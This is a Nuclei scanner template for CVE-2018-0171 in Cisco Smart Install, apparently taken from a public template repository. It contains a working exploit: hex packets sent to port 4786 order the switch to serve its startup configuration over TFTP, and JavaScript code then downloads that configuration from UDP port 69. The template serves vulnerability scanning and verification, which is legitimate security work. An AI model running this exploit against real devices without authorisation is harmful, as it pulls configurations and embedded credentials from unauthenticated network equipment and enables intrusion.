mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-03 01:03:34 +08:00
88 lines
3.5 KiB
YAML
88 lines
3.5 KiB
YAML
id: CVE-2018-0171
|
|
|
|
info:
|
|
name: Cisco Smart Install - Configuration Download
|
|
author: ritikchaddha,matejsmycka
|
|
severity: critical
|
|
description: |
|
|
A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data.
|
|
reference:
|
|
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-0171
|
|
- https://github.com/AlrikRr/Cisco-Smart-Exploit
|
|
- http://www.securitytracker.com/id/1040580
|
|
- https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-0171
|
|
cwe-id: CWE-20,CWE-787
|
|
epss-score: 0.93123
|
|
epss-percentile: 0.99786
|
|
cpe: cpe:2.3:o:cisco:ios:15.2\(5\)e:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: cisco
|
|
product: ios
|
|
shodan-query: 'port:4786 "Smart Install"'
|
|
tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp,vkev
|
|
|
|
flow: tcp(1) && javascript(1)
|
|
|
|
tcp:
|
|
- inputs:
|
|
- data: 00000001000000010000000A00000050FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF555CCA6800000000000000000000000000000000FFFFFFFF00000001
|
|
type: hex
|
|
- data: 000000010000000100000008000001680001001400000001000000000021D863A560000000020154636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
|
type: hex
|
|
|
|
host:
|
|
- "{{Hostname}}"
|
|
port: 4786
|
|
|
|
matchers:
|
|
- type: word
|
|
part: raw
|
|
words:
|
|
- ""
|
|
internal: true
|
|
|
|
javascript:
|
|
- pre-condition: |
|
|
isUDPPortOpen(Host,Port);
|
|
|
|
code: |
|
|
let packet = bytes.NewBuffer();
|
|
let message = "\x00\x01startup-config\x00octet\x00";
|
|
packet.WriteString(message);
|
|
|
|
let c = require("nuclei/net");
|
|
let conn = c.Open('udp', `${Host}:${Port}`);
|
|
conn.SendHex(packet.Hex());
|
|
let resp = conn.Recv(4096);
|
|
|
|
// Send malformed packet otherwise TFTP will not respond for around minute
|
|
let packet2 = bytes.NewBuffer();
|
|
let message2 = "\x00\x05error"
|
|
packet2.WriteString(message2);
|
|
conn.SendHex(packet2.Hex());
|
|
resp;
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 69
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'boot-start-marker'
|
|
- 'version'
|
|
- 'NVRAM'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
regex:
|
|
- "version\\s+(\\d+\\.\\d+)"
|
|
# digest: 4a0a00473045022100a072aed4e1f1b0608e853a90b7026aa31622663d0e0309ef4178a789a5dffb3802200dcaccd55f43030c8adf16004a0f2c03f5891b302ec4cd5529a403f25e9eb103:922c64590222798bb761d5b6d8e72950 |